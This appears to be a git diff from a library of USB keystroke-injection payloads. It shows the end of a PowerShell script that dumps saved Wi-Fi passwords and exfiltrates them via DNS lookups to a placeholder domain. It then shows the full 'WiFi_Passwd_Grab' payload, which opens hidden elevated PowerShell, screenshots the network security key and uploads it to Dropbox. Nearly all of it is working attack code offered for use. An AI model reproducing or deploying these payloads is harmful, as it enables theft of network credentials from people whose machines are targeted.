foreach ($hx in $b64){$hex=$hex+[System.String]::Format("{0:X}",[System.Convert]::ToUInt32($hx))} STRINGLN foreach ($hx in $b64){$hex=$hex+[System.String]::Format("{0:X}",[System.Convert]::ToUInt32($hx))}
return $hex STRINGLN return $hex
} STRINGLN }
function dns{ STRINGLN function dns{
$tik=Get-Date -UFormat "%j%H%M%S" STRINGLN $tik=Get-Date -UFormat "%j%H%M%S"
$subchars=get-random -minimum 26 -maximum 50 STRINGLN $subchars=get-random -minimum 26 -maximum 50
[regex]::split($_, "(.{$subchars})")|? {$_}|%{Resolve-DnsName -Name $(-join("T",$tik,".",$_,$SUB)) -Type A -QuickTimeout -ErrorAction SilentlyContinue -DnsOnly} STRINGLN [regex]::split($_, "(.{$subchars})")|? {$_}|%{Resolve-DnsName -Name $(-join("T",$tik,".",$_,$SUB)) -Type A -QuickTimeout -ErrorAction SilentlyContinue -DnsOnly}
start-sleep -Seconds $(get-random -minimum 1 -maximum 5) STRINGLN start-sleep -Seconds $(get-random -minimum 1 -maximum 5)
} STRINGLN }
function wifi { STRINGLN function wifi {
$wifinames=netsh wl sh pr|sls "\:(.+)$"|%{$name=$_.Matches.Groups[1].Value.Trim();$_}|%{(netsh wl sh pr n="$name" k=clear)}|sls "Key Content\W+\:(.+)$"|%{$pass=$_.Matches.Groups[1].Value.Trim(); $_}|%{[PSCustomObject]@{A=$name;B=$pass}}|ConvertTo-Csv -NTI -Delimiter ";"|Select -Skip 1 STRINGLN $wifinames=netsh wl sh pr|sls "\:(.+)$"|%{$name=$_.Matches.Groups[1].Value.Trim();$_}|%{(netsh wl sh pr n="$name" k=clear)}|sls "Key Content\W+\:(.+)$"|%{$pass=$_.Matches.Groups[1].Value.Trim(); $_}|%{[PSCustomObject]@{A=$name;B=$pass}}|ConvertTo-Csv -NTI -Delimiter ";"|Select -Skip 1
$wifinames.trim() STRINGLN $wifinames.trim()
} STRINGLN }
$KEY="EncryptDataWithThisCode" STRINGLN $KEY="EncryptDataWithThisCode"
$SUB=".i.yourdomain.com" STRINGLN $SUB=".i.yourdomain.com"
wifi|%{enc -K "$KEY" -T "$_"}|%{dns "$_"}|out-null STRINGLN wifi|%{enc -K "$KEY" -T "$_"}|%{dns "$_"}|out-null
} STRINGLN }
$encoded = [convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($scriptblock)) STRINGLN $encoded = [convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($scriptblock))
$encoded STRINGLN $encoded
#-----------------------------------------------------------------------------------------------------------
# END OF STORY
#-----------------------------------------------------------------------------------------------------------

232
payloads/library/exfiltration/WiFi_Passwd_Grab/payload.txt
View File

@ -1,223 +1,97 @@
REM Title: WiFi_Passwd_Grab REM_BLOCK
REM Author: LulzAnarchyAnon Title: WiFi_Passwd_Grab
REM Description: This is a Three stage payload that begins by navagating to Network Author: LulzAnarchyAnon
REM Description: and Sharing Center. It then opens the wireless properties security Description: This is a Three stage payload that begins by navagating to Network
REM Description: tab, and makes the Network security key visible finally taking a screenshot. Description: and Sharing Center. It then opens the wireless properties security
REM Description: In the Second stage the screenshot is saved to the Downloads folder. Description: tab, and makes the Network security key visible finally taking a screenshot.
REM Description: In the Third, and final stage the screenshot is uploaded via Dropbox. Description: In the Second stage the screenshot is saved to the Downloads folder.
REM Target: Windows 10 PowerShell Description: In the Third, and final stage the screenshot is uploaded via Dropbox.
REM Props: Darren Kitchen and I am Jakoby Target: Windows 10 PowerShell
REM Version: 1.0 Props: Darren Kitchen and I am Jakoby
REM Category: Exfiltration Version: 1.0
Category: Exfiltration
REM This payload may need minor adjustments to run properly depending on This payload may need minor adjustments to run properly depending on
REM Attacker, and Target devices. Attacker, and Target devices.
REM Check out I am Jakoby on Youtube to set up your DropBox for uploads. Check out I am Jakoby on Youtube to set up your DropBox for uploads.
REM THIS PAYLOAD IS FOR DEMONSTRATION PURPOSES ONLY, AND NOT INTENDED FOR MISUSE! THIS PAYLOAD IS FOR DEMONSTRATION PURPOSES ONLY, AND NOT INTENDED FOR MISUSE!
END_REM
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 1000
REM Stage 1 REM Stage 1
GUI r GUI r
DELAY 200
STRING powershell Start-Process PowerShell -verb runas -windowstyle hidden STRING powershell Start-Process PowerShell -verb runas -windowstyle hidden
DELAY 1000
ENTER ENTER
DELAY 1000
ALT Y ALT Y
DELAY 1000
GUI r GUI r
DELAY 1000
STRING control.exe /name Microsoft.NetworkAndSharingCenter STRING control.exe /name Microsoft.NetworkAndSharingCenter
DELAY 1000
ENTER ENTER
DELAY 1000
TAB TAB
DELAY 1000
ENTER ENTER
DELAY 1000
TAB TAB
DELAY 1000
ENTER ENTER
DELAY 1000
CTRL TAB CTRL TAB
DELAY 1000
TAB TAB
DELAY 1000 REPEAT 6 SHIFT TAB
SHIFT TAB
DELAY 1000
SHIFT TAB
DELAY 1000
SHIFT TAB
DELAY 1000
SHIFT TAB
DELAY 1000
SHIFT TAB
DELAY 1000
SHIFT TAB
DELAY 1000
SPACE SPACE
DELAY 2000
PRINTSCREEN PRINTSCREEN
DELAY 2000 REPEAT 3 ALT F4
ALT F4
DELAY 2000
ALT F4
DELAY 2000
ALT F4
DELAY 2000
REM STAGE 2 REM STAGE 2
GUI r GUI r
DELAY 200 STRINGLN powershell -windowstyle hidden
STRING powershell -windowstyle hidden STRINGLN mspaint
ENTER
DELAY 2000
STRING mspaint
ENTER
DELAY 5000
CTRL v CTRL v
DELAY 1000
CTRL s CTRL s
DELAY 1000
ALT d ALT d
DELAY 1000 STRINGLN %USERPROFILE%\Downloads
STRING %USERPROFILE%\Downloads REPEAT 6 TAB
DELAY 1000
ENTER
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
STRING wifipasswd STRING wifipasswd
DELAY 1000
ALT s ALT s
DELAY 1000
ALT F4 ALT F4
DELAY 5000
REM STAGE 3
STAGE 3
GUI r GUI r
DELAY 200 STRINGLN powershell
STRING powershell STRINGLN function DropBox-Upload {
DELAY 200 STRINGLN [CmdletBinding()]
ENTER STRINGLN param (
DELAY 2000 STRINGLN [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
STRINGLN [Alias("f")]
STRING function DropBox-Upload { STRINGLN [string]$SourceFilePath
STRINGLN )
DELAY 500 STRINGLN $DropBoxAccessToken = "$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE
ENTER STRINGLN "
STRINGLN $outputFile = Split-Path $SourceFilePath -leaf
STRING [CmdletBinding()] STRINGLN $TargetFilePath="/$outputFile"
DELAY 500 STRINGLN $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
ENTER STRINGLN $authorization = "Bearer " + $DropBoxAccessToken
STRING param ( STRINGLN $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
STRINGLN $headers.Add("Authorization", $authorization)
DELAY 500 STRINGLN $headers.Add("Dropbox-API-Arg", $arg)
ENTER STRINGLN $headers.Add("Content-Type", 'application/octet-stream')
STRINGLN Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
STRING [Parameter (Mandatory = $True, ValueFromPipeline = $True)] STRINGLN }
DELAY 500
ENTER
STRING [Alias("f")]
DELAY 500
ENTER
STRING [string]$SourceFilePath
DELAY 500
ENTER
STRING )
DELAY 500
ENTER
STRING $DropBoxAccessToken = "$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE
DELAY 500
ENTER
STRING "
DELAY 500
ENTER
STRING $outputFile = Split-Path $SourceFilePath -leaf
DELAY 500
ENTER
STRING $TargetFilePath="/$outputFile"
DELAY 500
ENTER
STRING $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
DELAY 500
ENTER
STRING $authorization = "Bearer " + $DropBoxAccessToken
DELAY 500
ENTER
STRING $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
DELAY 500
ENTER
STRING $headers.Add("Authorization", $authorization)
DELAY 500
ENTER
STRING $headers.Add("Dropbox-API-Arg", $arg)
DELAY 500
ENTER
STRING $headers.Add("Content-Type", 'application/octet-stream')
DELAY 500
ENTER
STRING Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
DELAY 500
ENTER
STRING }
DELAY 5000
GUI r GUI r
DELAY 200 STRINGLN %USERPROFILE%\Downloads\
STRING %USERPROFILE%\Downloads\ STRINGLN wifipasswd
DELAY 500
ENTER
DELAY 500
STRING wifipasswd
DELAY 1000
GUI r GUI r
DELAY 500 STRINGLN %USERPROFILE%\Downloads\
STRING %USERPROFILE%\Downloads\ STRINGLN wifipasswd
DELAY 500
ENTER
DELAY 500
STRING wifipasswd
DELAY 500
ALT h ALT h
DELAY 200 REPEAT 5 TAB
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 500
ENTER ENTER
DELAY 500
ALT F4 ALT F4
DELAY 1000
CTRL v CTRL v
DELAY 5000 STRINGLN | DropBox-Upload
STRING | DropBox-Upload
DELAY 500
ENTER
DELAY 5000
ENTER ENTER
ALT F4 ALT F4
DELAY 100
ENTER ENTER